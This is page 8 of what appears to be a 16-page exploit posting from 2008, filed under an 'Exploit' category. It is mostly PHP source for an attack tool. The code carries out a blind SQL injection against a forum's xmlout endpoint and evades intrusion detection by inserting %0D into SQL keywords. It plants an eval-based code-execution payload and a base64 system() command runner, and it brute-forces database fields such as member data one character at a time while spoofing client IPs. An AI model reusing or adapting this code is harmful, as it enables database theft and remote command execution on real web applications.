Add date: 10/16/2008   Publishing date: 10/16/2008   Hits: 9

---

Total 16 pages, Current page:8, Jump to page: 12345678910111213141516

$this->chr_num = range(0, 9); $this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') ); $this->chr_ip  = array_merge( $this->chr_num, array('.') ); $this->chr_all = array_merge( $this->chr_num, range('a', 'z') ); $this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe ); # SQL Injection $this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%'; # IDS Evasion via %0D $this->def_inj   = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #"; # Results $this->data = array(); $this->conf = array('ip' => '', 'browser' => '', 'xforward' => ''); # Misc $this->stat     = array(-1 => '-', 0 => '/', 1 => '+'); $this->s_bypass = false; $this->res_sep  = md5(rand()); $this->def_ip   = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255); # PHP Code $this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}'; $this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));"; $this->php_send .= "print('$this->res_sep');exit(0);"; # Regex $this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i'; $this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i"; $this->reg_cpre = '#^(.*)session_id$#'; # $this->reg_acp  = '#<a href="(.*)"[\x20]+target="_blank"#i'; # Default client headers $this->s_agent = 'Mozilla Firefox'; $this->s_ip    = $this->def_ip; return; } function bf_inj() { $this->sub_chr = $this->t_bchar; $this->key_val = ''; if( !empty($this->t_key) ) $this->msg('', 0); while( true ) { if( $this->t_bchar < 0 ) $this->sub_chr--; else $this->sub_chr++; # 0-9a-f for( $j=0;$j<=count($this->t_char);$j++ ) { # That one ? $chr = $this->t_char[$j]; # Latest char ? if( $j === count($this->t_char) ) $chr = $this->t_end; # Ascii num $asc = ord($chr); # Screen bug if( !empty($this->t_key) ) { $msg  = $this->t_key.'='.$this->key_val; $msg .= ($chr === $this->t_end ? "\x20" : $chr); $this->msg($msg, 0, 1, 1); } # Focus on the target ? if( !empty($this->t_join) ) { $inj = 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. ' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join. ' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field. ','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0; } else { $inj = 'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table. ' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr. ',1))='.$asc.' '.$this->t_add_0; } # SQL Injection via rawurldecode() $inj = str_replace('%rep_req%', $inj, $this->def_inj);   Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * Next>>

Prev:Postfix

Next:Invision Power Board

Comment:

---

Category: Home > Exploit